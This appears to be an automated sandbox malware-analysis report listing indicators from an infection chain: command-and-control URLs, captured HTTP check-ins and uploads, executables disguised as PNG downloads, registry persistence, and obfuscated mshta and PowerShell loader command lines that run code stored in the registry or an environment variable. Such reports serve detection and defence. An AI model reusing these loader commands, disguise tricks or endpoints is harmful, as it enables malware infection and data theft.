Source: powershell.exe	String found in binary or memory: http://185.117.72.90/upload.php:aln
Source: powershell.exe	String found in binary or memory: http://185.117.72.90/upload.php:alo
Source: powershell.exe	String found in binary or memory: http://185.117.72.90/upload.php:als
Source: powershell.exe	String found in binary or memory: http://185.117.72.90/upload.php:alx
Source: regsvr32.exe	String found in binary or memory: http://185.117.72.90/upload.php:al~~7
Source: a2.exe	String found in binary or memory: http://185.117.72.90/upload.phpll
Source: regsvr32.exe	String found in binary or memory: http://185.117.72.90/upload.phpr
Source: regsvr32.exe	String found in binary or memory: http://185.117.72.90/upload2.php
Source: a2.exe	String found in binary or memory: http://185.117.72.90/upload2.php1000
Source: regsvr32.exe	String found in binary or memory: http://185.117.72.90/upload2.php34320m
Source: regsvr32.exe	String found in binary or memory: http://185.117.72.90/upload2.phpl
Source: a1.exe	String found in binary or memory: http://91.210.166.51
Source: a1.exe	String found in binary or memory: http://91.210.166.51/
Source: a1.exe	String found in binary or memory: http://91.210.166.51/checkupdate
Source: a1.exe	String found in binary or memory: http://91.210.166.51/checkupdate&
Source: a1.exe	String found in binary or memory: http://91.210.166.51/checkupdated
Source: a1.exe	String found in binary or memory: http://91.210.166.51/checkupdatemicrosoft
Source: a1.exe	String found in binary or memory: http://91.210.166.51/checkupdater
Source: a1.exe	String found in binary or memory: http://91.210.166.5100
Source: wscript.exe	String found in binary or memory: http://baltasmenulis.lt/counter/?i=lrqadziqanpqacxla4p__r285amki81__3rpkyws4ham4nv8qlhokfhomht9fzlwl
Source: powershell.exe	String found in binary or memory: http://cdp1.public-trust.com/crl/omniroot2025.crl0
Source: powershell.exe	String found in binary or memory: http://crl.usertrust.com/utn-userfirst-object.crl0)
Source: powershell.exe	String found in binary or memory: http://cybertrust.omniroot.com/repository.cfm0
Source: a1.exe	String found in binary or memory: http://en.wikipedia.org/wiki/advanced_encryption_standard
Source: a1.exe	String found in binary or memory: http://en.wikipedia.org/wiki/rsa_(cryptosystem)
Source: powershell.exe	String found in binary or memory: http://go.microsof
Source: wscript.exe	String found in binary or memory: http://kidsgalaxy.fr/
Source: wscript.exe	String found in binary or memory: http://kidsgalaxy.fr/counter/?i=lrqadziqanpqacxla4p__r285amki81__3rpkyws4ham4nv8qlhokfhomht9fzlwlztl
Source: wscript.exe	String found in binary or memory: http://med-lex.com/
Source: wscript.exe	String found in binary or memory: http://med-lex.com/counter/?a=1nfzcr8ogaeev4nmxjbypnabevwbgpukhc&m=binging&i=lrqadziqanpqacxla4p__r2
Source: a1.exe	String found in binary or memory: http://post
Source: powershell.exe	String found in binary or memory: http://schemas.datacontract.org/2004/07/
Source: powershell.exe	String found in binary or memory: http://schemas.datacontract.org/2004/07/system.management.automation
Source: powershell.exe	String found in binary or memory: http://schemas.datacontract.org/2004/07/system.management.automationl
Source: powershell.exe	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: wscript.exe	String found in binary or memory: http://www.kidsgalaxy.fr/
Source: wscript.exe	String found in binary or memory: http://www.kidsgalaxy.fr/6
Source: wscript.exe	String found in binary or memory: http://www.kidsgalaxy.fr/counter/?i=lrqadziqanpqacxla4p__r285amki81__3rpkyws4ham4nv8qlhokfhomht9fzlw
Source: powershell.exe	String found in binary or memory: http://www.usertrust.com1
Source: regsvr32.exe	String found in binary or memory: https://
Source: regsvr32.exe	String found in binary or memory: https://fpdownload.macromedia.com/get/flashplayer/current/licensing/win/install_flash_player_24_acti
Source: wscript.exe	String found in binary or memory: https://login.live.com
Source: a1.exe	String found in binary or memory: https://www.torproject.org/download/download-easy.html

Uses HTTPS

Show sources

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49713
Source: unknown	Network traffic detected: HTTP traffic on port 49699 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49714
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49705
Source: unknown	Network traffic detected: HTTP traffic on port 49715 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49715
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49708
Source: unknown	Network traffic detected: HTTP traffic on port 49705 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49687
Source: unknown	Network traffic detected: HTTP traffic on port 49708 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49713 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49687 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49698 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49699
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49698
Source: unknown	Network traffic detected: HTTP traffic on port 49714 -> 443

Connects to several IPs in different countries

Show sources

Source: unknown

Network traffic detected: IP country count 11

Downloads executable code via HTTP

Show sources

Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OK Date: Mon, 06 Mar 2017 16:12:45 GMT Server: Apache Content-Disposition: attachment; filename=327856e80e5b3d16.png Connection: Upgrade, Keep-Alive Content-Length: 334848 Cache-Control: max-age=604800 Expires: Mon, 13 Mar 2017 16:12:45 GMT Keep-Alive: timeout=2, max=100 Content-Type: image/png Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 92 42 fa 6c d6 23 94 3f d6 23 94 3f d6 23 94 3f df 5b 01 3f fc 23 94 3f df 5b 17 3f 5d 23 94 3f df 5b 10 3f e0 23 94 3f f1 e5 ef 3f cd 23 94 3f d6 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$Bl#?#?#?[?#?[?]#?[
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OK Date: Mon, 06 Mar 2017 16:12:48 GMT Server: Apache Content-Disposition: attachment; filename=d9f1e17.png Content-Length: 379127 Cache-Control: max-age=604800 Expires: Mon, 13 Mar 2017 16:12:48 GMT Keep-Alive: timeout=2, max=99 Connection: Keep-Alive Content-Type: image/png Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 08 00 05 b5 68 44 00 00 00 00 00 00 00 00 e0 00 0f 03 0b 01 02 17 00 00 01 00 00 ce 04 00 00 40 00 00 47 22 00 00 00 10 00 00 00 10 01 00 00 00 40 00 00 10 00 00 00 02 00 00 04 00 00 00 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$

Uses a known web browser user agent for HTTP communication

Show sources

Source: global traffic	HTTP traffic detected: GET /counter/?a=1NfZcR8oGAEEV4NMxjbYPNABEVWBGpukhc&m=binging&i=LRQAdZIqANpqAcxla4p__r285AmKI81__3RpKYwS4ham4nv8QLhoKfHomHt9FZlWlZtLHOgicv0 HTTP/1.1 Accept: / Accept-Language: en-us Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729) Host: med-lex.com Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /counter/?i=LRQAdZIqANpqAcxla4p__r285AmKI81__3RpKYwS4ham4nv8QLhoKfHomHt9FZlWlZtLHOgicv0&a=1NfZcR8oGAEEV4NMxjbYPNABEVWBGpukhc&r=01 HTTP/1.1 Accept: / Accept-Language: en-us Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729) Host: kidsgalaxy.fr Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /counter/?i=LRQAdZIqANpqAcxla4p__r285AmKI81__3RpKYwS4ham4nv8QLhoKfHomHt9FZlWlZtLHOgicv0&a=1NfZcR8oGAEEV4NMxjbYPNABEVWBGpukhc&r=11 HTTP/1.1 Accept: / Accept-Language: en-us Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729) Host: baltasmenulis.lt Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /counter/?i=LRQAdZIqANpqAcxla4p__r285AmKI81__3RpKYwS4ham4nv8QLhoKfHomHt9FZlWlZtLHOgicv0&a=1NfZcR8oGAEEV4NMxjbYPNABEVWBGpukhc&r=12 HTTP/1.1 Accept: / Accept-Language: en-us Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729) Host: baltasmenulis.lt Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /checkupdate HTTP/1.1 Accept: / Accept-Language: en-us Referer: http://109.234.36.12/ x-requested-with: XMLHttpRequest Content-Type: application/x-www-form-urlencoded Accept-Encoding: gzip, deflate Cache-Control: no-cache User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729) Host: 109.234.36.12 Content-Length: 753 Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /checkupdate HTTP/1.1 Accept: / Accept-Language: en-us Referer: http://91.210.166.51/ x-requested-with: XMLHttpRequest Content-Type: application/x-www-form-urlencoded Accept-Encoding: gzip, deflate Cache-Control: no-cache User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729) Host: 91.210.166.51 Content-Length: 753 Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /checkupdate HTTP/1.1 Accept: / Accept-Language: en-us Referer: http://109.234.36.12/ x-requested-with: XMLHttpRequest Content-Type: application/x-www-form-urlencoded Accept-Encoding: gzip, deflate Cache-Control: no-cache User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729) Host: 109.234.36.12 Content-Length: 753 Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729) Host: 15.241.211.182 Content-Length: 512 Cache-Control: no-cache Data Raw: 65 57 6b 53 33 63 4e 71 56 75 6a 79 47 53 6f 7a 6d 63 63 62 32 46 6a 4e 72 4d 57 63 71 32 58 70 6d 69 6e 50 6c 6b 63 74 44 2f 68 33 66 78 4a 43 6e 4a 36 4c 68 56 6c 65 33 76 52 33 73 56 52 43 51 56 64 59 63 34 6c 39 70 48 6f 74 61 55 61 30 63 4d 6f 70 42 68 41 50 4f 47 4c 43 59 33 64 47 71 33 78 61 54 36 57 32 33 55 35 37 79 68 42 6f 51 57 55 62 44 78 36 62 55 4e 48 2b 37 47 63 70 6c 58 59 71 48 4a 47 52 77 45 4b 74 57 6c 47 56 63 47 78 36 73 34 78 48 76 61 6b 6d 35 34 2f 53 46 43 78 30 34 78 49 64 47 4f 79 62 44 52 75 48 36 59 4f 61 44 66 4d 31 78 67 47 73 43 6f 52 72 44 69 75 41 46 54 4e 36 44 2b 72 47 46 77 45 32 4d 7a 7a 50 65 43 63 51 63 55 4e 4a 57 61 4a 71 4a 47 6e 43 64 62 41 37 4a 66 6f 65 42 67 33 71 66
Source: global traffic	HTTP traffic detected: POST /checkupdate HTTP/1.1 Accept: / Accept-Language: en-us Referer: http://91.210.166.51/ x-requested-with: XMLHttpRequest Content-Type: application/x-www-form-urlencoded Accept-Encoding: gzip, deflate Cache-Control: no-cache User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729) Host: 91.210.166.51 Content-Length: 753 Connection: Keep-Alive

Downloads files with wrong headers with respect to MIME Content-Type

Show sources

Source: http	Image file has PE prefix: HTTP/1.1 200 OK Date: Mon, 06 Mar 2017 16:12:45 GMT Server: Apache Content-Disposition: attachment; filename=327856e80e5b3d16.png Connection: Upgrade, Keep-Alive Content-Length: 334848 Cache-Control: max-age=604800 Expires: Mon, 13 Mar 2017 16:12:45 GMT Keep-Alive: timeout=2, max=100 Content-Type: image/png Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 92 42 fa 6c d6 23 94 3f d6 23 94 3f d6 23 94 3f df 5b 01 3f fc 23 94 3f df 5b 17 3f 5d 23 94 3f df 5b 10 3f e0 23 94 3f f1 e5 ef 3f cd 23 94 3f d6 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$Bl#?#?#?[?#?[?]#?[
Source: http	Image file has PE prefix: HTTP/1.1 200 OK Date: Mon, 06 Mar 2017 16:12:48 GMT Server: Apache Content-Disposition: attachment; filename=d9f1e17.png Content-Length: 379127 Cache-Control: max-age=604800 Expires: Mon, 13 Mar 2017 16:12:48 GMT Keep-Alive: timeout=2, max=99 Connection: Keep-Alive Content-Type: image/png Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 08 00 05 b5 68 44 00 00 00 00 00 00 00 00 e0 00 0f 03 0b 01 02 17 00 00 01 00 00 ce 04 00 00 40 00 00 47 22 00 00 00 10 00 00 00 10 01 00 00 00 40 00 00 10 00 00 00 02 00 00 04 00 00 00 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$

Boot Survival:

Creates an autostart registry key

Show sources

Source: C:\Windows\SysWOW64\regsvr32.exe	Registry value created or modified: HKEY_USERS\SOFTWARE\Microsoft\Windows\CurrentVersion\Run unknown
Source: C:\Windows\SysWOW64\regsvr32.exe	Registry value created or modified: HKEY_USERS\SOFTWARE\Microsoft\Windows\CurrentVersion\Run unknown

Persistence and Installation Behavior:

Drops PE files

Show sources

Source: C:\Windows\SysWOW64\wscript.exe	File created: C:\Users\admin\AppData\Local\Microsoft\Windows\INetCache\IE\JXUFDVKV\d9f1e17[1].png
Source: C:\Windows\SysWOW64\wscript.exe	File created: C:\Users\admin\AppData\Local\Microsoft\Windows\INetCache\IE\F989WBDG\327856e80e5b3d16[1].png
Source: C:\Windows\SysWOW64\wscript.exe	File created: C:\Users\admin\AppData\Local\Temp\a1.exe
Source: C:\Windows\SysWOW64\wscript.exe	File created: C:\Users\admin\AppData\Local\Temp\a2.exe

Drops files with a non-matching file extension (content does not match file extension)

Show sources

Source: C:\Windows\SysWOW64\wscript.exe	File created: C:\Users\admin\AppData\Local\Microsoft\Windows\INetCache\IE\F989WBDG\327856e80e5b3d16[1].png
Source: C:\Windows\SysWOW64\wscript.exe	File created: C:\Users\admin\AppData\Local\Microsoft\Windows\INetCache\IE\JXUFDVKV\d9f1e17[1].png

Data Obfuscation:

Contains functionality to dynamically determine API calls

Show sources

Source: C:\Users\admin\AppData\Local\Temp\a1.exe

Code function: 3_2_0258FE77 LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

3_2_0258FE77

Generates new code (likely due to unpacking of malware or shellcode)

Show sources

Source: C:\Users\admin\AppData\Local\Temp\a1.exe	Code execution: Found new code
Source: C:\Users\admin\AppData\Local\Temp\a2.exe	Code execution: Found new code
Source: C:\Users\admin\AppData\Local\Temp\a2.exe	Code execution: Found new code

PE file contains an invalid checksum

Show sources

Source: 327856e80e5b3d16[1].png.3044.dr

Static PE information: real checksum: 0x59c4e should be: 0x8a5cc5

Uses code obfuscation techniques (call, push, ret)

Show sources

Source: C:\Windows\SysWOW64\wscript.exe	Code function: 0_2_06BAB78A push es; ret	0_2_06BAB790
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 0_2_06BAACA3 push es; retf	0_2_06BAACA4
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 0_2_06BAED6B push es; iretd	0_2_06BAED6C
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 0_2_06BAB17D push ecx; ret	0_2_06BAB17E
Source: C:\Users\admin\AppData\Local\Temp\a2.exe	Code function: 5_2_004021D8 push 00402210h; ret	5_2_00402208
Source: C:\Users\admin\AppData\Local\Temp\a2.exe	Code function: 5_2_00AF8B38 push 00AF8CA0h; ret	5_2_00AF8C98
Source: C:\Users\admin\AppData\Local\Temp\a2.exe	Code function: 5_2_00B20648 push 00B206D8h; ret	5_2_00B206D0
Source: C:\Users\admin\AppData\Local\Temp\a2.exe	Code function: 5_2_00AF0584 push ecx; retf	5_2_00AF0590
Source: C:\Users\admin\AppData\Local\Temp\a2.exe	Code function: 5_2_00AE6588 push 00AE6677h; ret	5_2_00AE666F
Source: C:\Users\admin\AppData\Local\Temp\a2.exe	Code function: 5_2_00B2BF58 push ecx; mov dword ptr [esp], FFFFFFFFh	5_2_00B2BF5B
Source: C:\Users\admin\AppData\Local\Temp\a2.exe	Code function: 5_2_00AEBF64 push 00AEBF97h; ret	5_2_00AEBF8F
Source: C:\Users\admin\AppData\Local\Temp\a2.exe	Code function: 5_2_00B0A7F0 push 00B0A81Ch; ret	5_2_00B0A814
Source: C:\Users\admin\AppData\Local\Temp\a2.exe	Code function: 5_2_00AF18C4 push 00AF18F0h; ret	5_2_00AF18E8
Source: C:\Users\admin\AppData\Local\Temp\a2.exe	Code function: 5_2_00AF181F push 00AF18BAh; ret	5_2_00AF18B2
Source: C:\Users\admin\AppData\Local\Temp\a2.exe	Code function: 5_2_00AE6CEC push 00AE6D18h; ret	5_2_00AE6D10
Source: C:\Users\admin\AppData\Local\Temp\a2.exe	Code function: 5_2_00AEB6B8 push 00AEB6E4h; ret	5_2_00AEB6DC
Source: C:\Users\admin\AppData\Local\Temp\a2.exe	Code function: 5_2_00AFA74C push 00AFA778h; ret	5_2_00AFA770
Source: C:\Users\admin\AppData\Local\Temp\a2.exe	Code function: 5_2_00B07CE4 push 00B07D71h; ret	5_2_00B07D69
Source: C:\Users\admin\AppData\Local\Temp\a2.exe	Code function: 5_2_00B0DDC4 push 00B0DDF0h; ret	5_2_00B0DDE8
Source: C:\Users\admin\AppData\Local\Temp\a2.exe	Code function: 5_2_00AED08B push 00AED124h; ret	5_2_00AED11C
Source: C:\Users\admin\AppData\Local\Temp\a2.exe	Code function: 5_2_00AED8D4 push 00AED8FDh; ret	5_2_00AED8F5
Source: C:\Users\admin\AppData\Local\Temp\a2.exe	Code function: 5_2_00AF1914 push 00AF1946h; ret	5_2_00AF193E
Source: C:\Users\admin\AppData\Local\Temp\a2.exe	Code function: 5_2_00B0D88C push 00B0D8CEh; ret	5_2_00B0D8C6
Source: C:\Users\admin\AppData\Local\Temp\a2.exe	Code function: 5_2_00B2CAF4 push 00B2CB39h; ret	5_2_00B2CB31
Source: C:\Users\admin\AppData\Local\Temp\a2.exe	Code function: 5_2_00AF06C0 push ss; ret	5_2_00AF06C5
Source: C:\Users\admin\AppData\Local\Temp\a2.exe	Code function: 5_2_00B0DDFC push 00B0DE28h; ret	5_2_00B0DE20
Source: C:\Users\admin\AppData\Local\Temp\a2.exe	Code function: 5_2_00B20F80 push 00B20FD7h; ret	5_2_00B20FCF
Source: C:\Users\admin\AppData\Local\Temp\a2.exe	Code function: 5_2_00B160E4 push 00B16126h; ret	5_2_00B1611E
Source: C:\Users\admin\AppData\Local\Temp\a2.exe	Code function: 5_2_00AF2B70 push 00AF2B9Ch; ret	5_2_00AF2B94
Source: C:\Users\admin\AppData\Local\Temp\a2.exe	Code function: 5_2_00AF1878 push 00AF18BAh; ret	5_2_00AF18B2
Source: C:\Users\admin\AppData\Local\Temp\a2.exe	Code function: 5_2_00AE8198 push 00AE81C4h; ret	5_2_00AE81BC

Obfuscated command line found

Show sources

Source: unknown

Process created: C:\Windows\System32\mshta.exe 'C:\Windows\system32\mshta.exe' javascript:Blw24ZfAP='Wju';Ta3=new%20ActiveXObject('WScript.Shell');y2wk8tsp='OcRo8M';w4EEw5=Ta3.RegRead('HKCU\\software\\jc9v3o\\Ao1TeK6zT');cf6Ltc='YA5O';eval(w4EEw5);Rzo9PdzY='p012X';

Suspicious powershell command line found

Show sources

Source: unknown	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe' iex $env:jxys
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe' iex $env:jxys

Spreading:

Contains functionality to enumerate / list files inside a directory

Show sources

Source: C:\Users\admin\AppData\Local\Temp\a1.exe	Code function: 3_2_025897BF __EH_prolog,FindFirstFileW,__wcsicoll,__wcsicoll,FindNextFileW,FindClose,	3_2_025897BF
Source: C:\Users\admin\AppData\Local\Temp\a1.exe	Code function: 3_2_02587314 FindFirstFileW,FindClose,	3_2_02587314
Source: C:\Users\admin\AppData\Local\Temp\a1.exe	Code function: 3_1_0040200D CryptMsgCountersignEncoded,LoadMenuA,CreateMenu,LoadMenuA,LoadBitmapA,AppendMenuA,LoadMenuA,CryptMsgDuplicate,GetStockObject,GetStockObject,SelectObject,GetStockObject,GetObjectA,SendMessageA,OffsetRect,GetPixel,BeginPaint,DrawTextA,DefWindowProcA,BeginPaint,GetClientRect,DrawTextA,EndPaint,PostQuitMessage,DefWindowProcA,GetDlgItem,CreateWindowExA,BeginPaint,SetWindowPos,SetWindowLongA,BeginPaint,MultiByteToWideChar,BeginPaint,MultiByteToWideChar,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,GetWindowRect,GetCursorPos,PtInRect,SendMessageA,GetScrollPos,SetScrollPos,InvalidateRect,BeginPaint,LockResource,GetClientRect,DrawTextA,EndPaint,MoveWindow,SetFocus,FreeResource,PostQuitMessage,GetDC,GetTextMetricsA,ReleaseDC,GetSystemMetrics,CreateWindowExA,LoadStringA,FindResourceA,LoadResource,LockResource,CharNextA,SetScrollRange,SetScrollPos,SendMessageA,GetLastError,CreateWindowExA,ImageList_Create,SendMessageA,SendMessageA,ICLocate,ICOpen,ICSendMessage,ICClose,ICInfo,ICGetInfo,SendM	3_1_0040200D
Source: C:\Users\admin\AppData\Local\Temp\a2.exe	Code function: 5_2_00B29E80 FindFirstFileW,FindClose,FileTimeToSystemTime,FileTimeToSystemTime,FindFirstFileW,FindClose,FileTimeToSystemTime,FileTimeToSystemTime,	5_2_00B29E80
Source: C:\Users\admin\AppData\Local\Temp\a2.exe	Code function: 5_2_00AE5840 GetModuleHandleA,GetProcAddress,lstrcpy,lstrcpyn,lstrcpyn,FindFirstFileA,FindClose,lstrlen,lstrcpy,lstrlen,lstrcpy,	5_2_00AE5840
Source: C:\Users\admin\AppData\Local\Temp\a2.exe	Code function: 5_2_00B2B32C FindFirstFileW,FindClose,FileTimeToSystemTime,	5_2_00B2B32C
Source: C:\Users\admin\AppData\Local\Temp\a2.exe	Code function: 5_2_00B2B08C FindFirstFileW,FindClose,FileTimeToSystemTime,	5_2_00B2B08C
Source: C:\Users\admin\AppData\Local\Temp\a2.exe	Code function: 5_2_00B163DC FindFirstFileW,FindClose,FileTimeToSystemTime,FileTimeToSystemTime,	5_2_00B163DC
Source: C:\Users\admin\AppData\Local\Temp\a2.exe	Code function: 5_2_00B2B420 FindFirstFileW,FindClose,FileTimeToSystemTime,FileTimeToSystemTime,	5_2_00B2B420
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 9_2_008CB32C FindFirstFileW,FindClose,FileTimeToSystemTime,	9_2_008CB32C
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 9_2_00885840 GetModuleHandleA,GetProcAddress,lstrcpy,lstrcpyn,lstrcpyn,FindFirstFileA,FindClose,lstrlen,lstrcpy,lstrlen,lstrcpy,	9_2_00885840
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 9_2_008D1E74 FindFirstFileW,6E15D4C0,6E15DFB0,6E15D4C0,FindNextFileW,FindClose,FindFirstFileW,RemoveDirectoryW,6E15DFB0,RemoveDirectoryW,FindNextFileW,FindClose,RemoveDirectoryW,6E15DFB0,RemoveDirectoryW,	9_2_008D1E74
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 9_2_008CB420 FindFirstFileW,FindClose,FileTimeToSystemTime,FileTimeToSystemTime,	9_2_008CB420
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 9_2_008CB08C FindFirstFileW,FindClose,FileTimeToSystemTime,	9_2_008CB08C
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 9_2_008B63DC FindFirstFileW,FindClose,FileTimeToSystemTime,FileTimeToSystemTime,	9_2_008B63DC
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 9_2_008C9E80 FindFirstFileW,FindClose,FileTimeToSystemTime,FileTimeToSystemTime,FindFirstFileW,FindClose,FileTimeToSystemTime,FileTimeToSystemTime,	9_2_008C9E80
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 12_2_0104B32C FindFirstFileW,FindClose,FileTimeToSystemTime,	12_2_0104B32C
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 12_2_010363DC FindFirstFileW,FindClose,FileTimeToSystemTime,FileTimeToSystemTime,	12_2_010363DC
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 12_2_01005840 GetModuleHandleA,GetProcAddress,lstrcpy,lstrcpyn,lstrcpyn,FindFirstFileA,FindClose,lstrlen,lstrcpy,lstrlen,lstrcpy,	12_2_01005840
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 12_2_0104B420 FindFirstFileW,FindClose,FileTimeToSystemTime,FileTimeToSystemTime,	12_2_0104B420
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 12_2_01051E74 FindFirstFileW,6E15D4C0,6E15DFB0,6E15D4C0,FindNextFileW,FindClose,FindFirstFileW,RemoveDirectoryW,6E15DFB0,RemoveDirectoryW,FindNextFileW,FindClose,RemoveDirectoryW,6E15DFB0,RemoveDirectoryW,	12_2_01051E74
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 12_2_01049E80 FindFirstFileW,FindClose,FileTimeToSystemTime,FileTimeToSystemTime,FindFirstFileW,FindClose,FileTimeToSystemTime,FileTimeToSystemTime,	12_2_01049E80
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 12_2_0104B08C FindFirstFileW,FindClose,FileTimeToSystemTime,	12_2_0104B08C

System Summary:

Reads internet explorer settings

Show sources

Source: C:\Windows\System32\mshta.exe

Key opened: HKEY_USERS\SOFTWARE\Microsoft\Internet Explorer\Settings

Found graphical window changes (likely an installer)

Show sources

Source: Window Recorder

Window detected: More than 3 window changes detected

Uses Microsoft Silverlight

Show sources

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Binary contains paths to debug symbols

Show sources

Source:	Binary string: wow64win.pdb source: regsvr32.exe
